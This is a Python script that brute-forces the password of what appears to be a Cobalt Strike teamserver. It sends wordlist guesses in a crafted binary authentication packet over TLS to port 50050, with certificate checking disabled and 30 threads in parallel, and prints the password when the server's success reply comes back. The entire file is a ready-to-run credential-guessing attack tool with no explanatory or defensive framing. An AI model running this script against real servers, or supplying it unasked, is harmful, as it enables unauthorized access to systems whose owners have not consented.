└── brute_cs_pwd.py /brute_cs_pwd.py: -------------------------------------------------------------------------------- 1 | 2 | import time,socket,ssl,argparse,concurrent.futures,sys 3 | 4 | MIN_PYTHON = (3, 3) 5 | if sys.version_info < MIN_PYTHON: 6 | sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON) 7 | 8 | parser = argparse.ArgumentParser() 9 | 10 | parser.add_argument("host", 11 | help="Teamserver address") 12 | parser.add_argument("wordlist", nargs="?", 13 | help="Newline-delimited word list file") 14 | 15 | args = parser.parse_args() 16 | 17 | class NotConnectedException(Exception): 18 | def __init__(self, message=None, node=None): 19 | self.message = message 20 | self.node = node 21 | 22 | class DisconnectedException(Exception): 23 | def __init__(self, message=None, node=None): 24 | self.message = message 25 | self.node = node 26 | 27 | class Connector: 28 | def __init__(self): 29 | self.sock = None 30 | self.ssl_sock = None 31 | self.ctx = ssl.SSLContext() 32 | self.ctx.verify_mode = ssl.CERT_NONE 33 | pass 34 | 35 | def is_connected(self): 36 | return self.sock and self.ssl_sock 37 | 38 | def open(self, hostname, port): 39 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 40 | self.sock.settimeout(10) 41 | self.ssl_sock = self.ctx.wrap_socket(self.sock) 42 | 43 | if hostname == socket.gethostname(): 44 | ipaddress = socket.gethostbyname_ex(hostname)[2][0] 45 | self.ssl_sock.connect((ipaddress, port)) 46 | else: 47 | self.ssl_sock.connect((hostname, port)) 48 | 49 | def close(self): 50 | if self.sock: 51 | self.sock.close() 52 | self.sock = None 53 | self.ssl_sock = None 54 | 55 | def send(self, buffer): 56 | if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)") 57 | self.ssl_sock.sendall(buffer) 58 | 59 | def receive(self): 60 | if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)") 61 | received_size = 0 62 | data_buffer = b"" 63 | 64 | while received_size < 4: 65 | data_in = self.ssl_sock.recv() 66 | data_buffer = data_buffer + data_in 67 | received_size += len(data_in) 68 | 69 | return data_buffer 70 | 71 | def passwordcheck(password): 72 | if len(password) > 0: 73 | result = None 74 | conn = Connector() 75 | conn.open(args.host, 50050) 76 | payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) 77 | conn.send(payload) 78 | if conn.is_connected(): result = conn.receive() 79 | if conn.is_connected(): conn.close() 80 | if result == bytearray(b"\x00\x00\xca\xfe"): return password 81 | else: return False 82 | else: print("Do not have a blank password!!!") 83 | 84 | passwords = [] 85 | 86 | if args.wordlist: passwords = open(args.wordlist).read().split("\n") 87 | else: 88 | for line in sys.stdin: passwords.append(line.rstrip()) 89 | 90 | if len(passwords) > 0: 91 | attempts = 0 92 | failures = 0 93 | 94 | with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: 95 | 96 | future_to_check = {executor.submit(passwordcheck, password): password for password in passwords} 97 | for future in concurrent.futures.as_completed(future_to_check): 98 | password = future_to_check[future] 99 | try: 100 | data = future.result() 101 | attempts = attempts + 1 102 | if data: 103 | print ("Successful Attack!!!") 104 | print("Target Password: {}".format(password)) 105 | except Exception as exc: 106 | failures = failures + 1 107 | print('%r generated an exception: %s' % (password, exc)) 108 | 109 | else: 110 | print("Password(s) required") 111 | --------------------------------------------------------------------------------